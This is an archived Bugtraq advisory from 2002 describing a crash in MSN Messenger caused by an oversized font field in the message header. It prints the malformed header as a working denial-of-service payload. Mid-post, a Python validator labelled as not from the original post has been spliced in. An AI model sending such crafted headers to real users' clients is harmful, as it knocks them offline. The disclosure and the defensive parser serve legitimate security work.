[25371] in bugtraq


Misformated message header causes msn messenger to crash

daemon@ATHENA.MIT.EDU (underdoc@pandora.be)
Mon May 6 15:08:54 2002

Date: 6 May 2002 15:04:13 -0000
Message-ID: <20020506150413.18983.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <underdoc@pandora.be>
To: bugtraq@securityfocus.com



Introduction to the flaw.
MSN Messenger is a popular instant-messaging client from 
Microsoft. After the previous flaws regarding the privacy 
of users, another flaw has been discovered. This flaw makes the 
MSN Messenger client crash after it receives a misformatted 
font variable in the header of an instant message. 

How does it work exactly?
The MSN Messenger client sends a header with every message. 
So every time a user wants to send a message, the client 
generates a header containing information about the font, 
the colour of the message and some other information. 

The flaw
A normal header looks something like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

When we replace the font field with something very large, 
creating an overflow, the header looks like this:

<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; 
PF=22

hey friend, how are you?
<end>

As a result the MSN Messenger client will crash.

This flaw only crashes Microsoft's MSN Messenger client. 
Trillian is not affected.
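As an added example (not from the post, and not Microsoft's code), a Python parser for the message header shown above that decodes and bounds the FN field before the value is used; the cap MAX_FONT_NAME and both sample payloads are constructed for this example, and the normal one is accepted while the oversized one is rejected instead of reaching the font-handling code.

```python
from urllib.parse import unquote
# Assumed bound on a decoded font name (constructed for this example, not a Microsoft limit).
MAX_FONT_NAME = 64

# Constructed sample payloads modelled on the two header blocks in the post.
NORMAL_MESSAGE = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22\r\n"
    "\r\nhey friend, how are you?"
)
OVERSIZED_MESSAGE = (
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=UTF-8\r\n"
    "X-MMS-IM-Format: FN=Times" + "%20" * 300 + "New%20Roman; EF=B; CO=ff; CS=0; PF=22\r\n"
    "\r\nhey friend, how are you?"
)

def split_headers(raw):
    """Split a payload into (headers, body); headers end at the first blank line."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n"):
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower()] = value.strip()
    return headers, body

def parse_im_format(value):
    """Parse 'FN=...; EF=...; CO=...' into a dict, bounding the decoded font name."""
    fields = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        key, sep, val = part.partition("=")
        if not sep:
            raise ValueError("bad field: %r" % part)
        fields[key.strip().upper()] = val.strip()
    font = unquote(fields.get("FN", ""))
    if len(font) > MAX_FONT_NAME:
        raise ValueError("font name too long (%d chars)" % len(font))
    fields["FN"] = font
    return fields

def check_message(raw):
    """Return the parsed format fields, or None when the header must be rejected."""
    try:
        return parse_im_format(split_headers(raw)[0].get("x-mms-im-format", ""))
    except ValueError:
        return None
```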

This flaw is a severe danger, as it is not so hard for 
hackers to use it in their own application. 
Microsoft has been informed of this issue. 

